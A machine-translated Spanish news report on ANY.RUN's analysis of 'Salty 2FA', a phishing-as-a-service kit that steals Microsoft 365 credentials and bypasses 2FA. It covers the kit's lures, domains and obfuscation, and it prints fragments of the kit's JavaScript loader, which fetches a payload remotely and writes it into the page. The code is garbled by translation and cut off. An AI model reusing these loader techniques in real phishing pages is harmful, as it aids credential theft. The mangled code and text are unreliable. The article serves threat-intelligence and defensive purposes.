Un nuevo marco sofisticado de phishing as-a-Service (PHAAS) denominado “Salty 2FA” se ha convertido en una amenaza significativa para los usuarios de Microsoft 365 en las industrias estadounidenses y europeas.
Esta plataforma previamente indocumentada emplea técnicas de ofuscación avanzadas y cadenas de ejecución de etapas múltiples diseñadas específicamente para evitar mecanismos de autenticación de dos factores mientras roba credenciales corporativas.
El marco se dirige a organizaciones que abarcan financiamiento, telecomunicaciones, energía, logística y sectores educativos a través de campañas de phishing cuidadosamente elaboradas.
El malware se distingue a través de un patrón de infraestructura de dominio único que combina dominios compuestos en zonas “.com” con dominios registrados bajo dominios de nivel superior ruso “.ru”.
Combinación de dominio sospechoso (fuente – Any.run)
Este emparejamiento distintivo crea una compleja red de redirecciones y mecanismos de entrega de carga útil que han ayudado a la plataforma a evadir los sistemas de detección tradicionales.
Las víctimas reciben correos electrónicos de phishing que contienen varios señuelos, incluidos mensajes de voz falsos, solicitudes de acceso a documentos y declaraciones de facturación que los redirigen a convencer a las réplicas de inicio de sesión de Microsoft.
Any. Analistas identificado Este marco PHAA previamente desconocido durante la caza de campañas de phishing rutinaria cuando descubrieron múltiples sesiones de sandbox que exhiben patrones de comportamiento similares a pesar de usar diferentes dominios y técnicas de ofuscación.
Análisis de una página de phishing (fuente – Any.run)
El uso constante de la protección del torniquete de CloudFlare combinada con el emparejamiento de dominio distintivo inicialmente marcó estas campañas como potencialmente relacionadas, lo que llevó al análisis exhaustivo que reveló las capacidades completas de Salty 2FA.
La plataforma demuestra sobre la sofisticación en su capacidad para interceptar y procesar múltiples métodos de autenticación de dos factores, incluidas notificaciones push, códigos SMS, llamadas de voz y tokens de aplicaciones de autenticador.
Esta capacidad extiende el ataque más allá del simple robo de credenciales, lo que permite a los actores de amenaza a mantener el acceso persistente a cuentas comprometidas incluso cuando existen protecciones tradicionales de 2FA.
Cadena de ejecución de múltiples etapas y técnicas de ofuscación
La arquitectura técnica de Salty 2FA se basa en un proceso de ejecución de cinco etapas cuidadosamente orquestado diseñado para resistir el análisis y la detección.
Código ofuscado (fuente – Any.run)
La etapa inicial comienza con una función de JavaScript ofned que sirve como punto de entrada, que contiene comentarios de cotización inspiradores como ruido para complicar el análisis estático.
Async Function vitals () {function whiz (math) {return (… atob (math)). map ((lewd, matchmaking, imprudente) => imprudente (0)? stromchomCharCode ((lewd.charcodeat (0)- imprudente (0) .charcodeat (0) +256)%256): “); } if (sessionStorage (0)) {document.write (whiz (sessionStorage (0))); devolver; } desastrado = espera (espera fetch (espera whiz (`1pwicaqhzspdafug // kibad19/ngypn9wgyjw8m =`))). text (); document.write (espera el amhiz (no ganado)); sessionStorage (0) = no ganado; }
El marco emplea la codificación sofisticada de ID de elementos utilizando operaciones Base64 y XOR con un valor generado fijo, lo que hace que el análisis dinámico sea significativamente más desafiante.
Toda la lógica delantera se basa en las llamadas de jQuery a identificadores de elementos generados dinámicamente, que deben decodificarse a través de una rutina dedicada antes de la manipulación.
función decode (s) {try {var r = “” “; r = ATOB (S); var d = ”; for (var i = 0; i
La exfiltración de datos utiliza la misma técnica XOR con claves derivadas de la sesión, mientras que las credenciales robadas se transmiten a servidores alojados en ruso a través de solicitudes postales codificadas que contienen tanto los datos cifrados como los parámetros de decodificación.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
